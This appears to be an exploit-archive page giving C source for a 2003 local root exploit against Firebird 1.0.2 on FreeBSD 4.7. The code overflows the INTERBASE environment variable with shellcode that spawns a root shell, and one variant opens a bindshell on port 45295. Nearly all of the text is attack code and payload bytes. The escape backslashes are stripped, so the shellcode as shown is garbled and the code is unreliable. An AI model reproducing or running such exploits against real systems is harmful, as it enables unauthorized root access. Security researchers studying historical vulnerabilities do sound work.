[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Firebird 1.0.2 FreeBSD 4.7-RELEASE Local Root Exploit
# Published : 2003-05-12
# Author : bob
# Previous Title : Qpopper 4.0.x poppassd Local Root Exploit
# Next Title : Mac OS X <= 10.2.4 DirectoryService (PATH) Local Root Exploit
/* DSR-firebird.c
-------------------------------
Tested on: Firebird 1.0.2 FreeBSD 4.7-RELEASE
This is Proof Of concept code.
bash-2.05a$ ./DSR-firebird
( ( Firebird-1.0.2 Local exploit for Freebsd 4.7 ) )
( ( by - bob@dtors.net ) )
----------------------------------------------------
Usage: ./DSR-firebird <target#>
Targets:
1. [0xbfbff75d] - gds_inet_server
2. [0xbfbff75c] - gds_lock_mgr
3. [0xbfbff75e] - gds_drop
bash-2.05a$
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define LOCK "/usr/local/firebird/bin/gds_lock_mgr"
#define DROP "/usr/local/firebird/bin/gds_drop"
#define INET "/usr/local/firebird/bin/gds_inet_server"
#define LEN 1056
char dropcode[]=
"x31xc0x50x6ax5ax53xb0x17xcdx80"
"x31xc0x50x68x2fx2fx73x68x68x2f"
"x62x69x6ex89xe3x50x54x53x50xb0"
"x3bxcdx80x31xc0xb0x01xcdx80";
char inetcode[]=
"x31xc0x50x6ax5ax53xb0x17xcdx80"
"x31xc0x50x68x2fx2fx73x68x68x2f"
"x62x69x6ex89xe3x50x54x53x50xb0"
"x3bxcdx80x31xc0xb0x01xcdx80";
char lockcode[]=
"x31xc0x31xdbxb0x02xcdx80"
"x39xc3x75x06x31xc0xb0x01xcdx80"
"x31xc0x50x6ax5ax53xb0x17xcdx80" //setuid[firebird] by
bob
"x31xc0x31xdbx53xb3x06x53" //fork() bindshell by eSDee
"xb3x01x53xb3x02x53x54xb0"
"x61xcdx80x89xc7x31xc0x50"
"x50x50x66x68xb0xefxb7x02"
"x66x53x89xe1x31xdbxb3x10"
"x53x51x57x50xb0x68xcdx80"
"x31xdbx39xc3x74x06x31xc0"
"xb0x01xcdx80x31xc0x50x57"
"x50xb0x6axcdx80x31xc0x31"
"xdbx50x89xe1xb3x01x53x89"
"xe2x50x51x52xb3x14x53x50"
"xb0x2excdx80x31xc0x50x50"
"x57x50xb0x1excdx80x89xc6"
"x31xc0x31xdbxb0x02xcdx80"
"x39xc3x75x44x31xc0x57x50"
"xb0x06xcdx80x31xc0x50x56"
"x50xb0x5axcdx80x31xc0x31"
"xdbx43x53x56x50xb0x5axcd"
"x80x31xc0x43x53x56x50xb0"
"x5axcdx80x31xc0x50x68x2f"
"x2fx73x68x68x2fx62x69x6e"
"x89xe3x50x54x53x50xb0x3b"
"xcdx80x31xc0xb0x01xcdx80"
"x31xc0x56x50xb0x06xcdx80"
"xebx9a";
char *decide(char *string)
{
if(!(strcmp(string, "1")))
return((char *)&inetcode);
if(!(strcmp(string, "2")))
return((char *)&lockcode);
if(!(strcmp(string, "3")))
return((char *)&dropcode);
exit(0);
}
int main(int argc, char **argv)
{
unsigned long ret = 0xbfbff743;
char *selectcode;
char buffer[LEN];
char egg[1024];
char *ptr;
int i=0;
if(argc < 2)
{
printf("( ( Firebird-1.0.2 Local exploit for Freebsd
4.7 ) )n");
printf("( ( by -
bob@dtors.net ) )n");
printf("---------------------------------------------------
-nn");
printf("Usage: %s <target#> n", argv[0]);
printf("Targets:n");
printf("1. [0xbfbff743] - gds_inet_servern");
printf("2. [0xbfbff743] - gds_lock_mgrn");
printf("3. [0xbfbff743] - gds_dropn");
printf("nwww.dtors.netn");
exit(0);
}
selectcode = (char *)decide(argv[1]);
memset(buffer, 0x41, sizeof(buffer));
ptr = egg;
for (i = 0; i < 1024 - strlen(selectcode) -1; i++) *(ptr++) = 0x90;
for (i = 0; i < strlen(selectcode); i++) *(ptr++) = selectcode[i];
egg[1024 - 1] = ' ';
memcpy(egg,"EGG=",4);
putenv(egg);
memcpy(&buffer[1052],(char *)&ret,4);
buffer[1056] = 0;
setenv("INTERBASE", buffer, 1);
fprintf(stdout, "Return Address: 0x%xn", ret);
fprintf(stdout, "Buffer Size: %dn", LEN);
fprintf(stdout, "Setuid [90]n");
if(selectcode == (char *)&inetcode)
{
execl(INET, INET, NULL);
return 0;
}
if(selectcode == (char *)&lockcode)
{
printf("nShell is on port 45295nExploit will hang!n");
execl(LOCK, LOCK, NULL);
return 0;
}
if(selectcode == (char *)&dropcode)
{
execl(DROP, DROP, NULL);
return 0;
}
return 0;
}
// www.Syue.com [2003-05-12]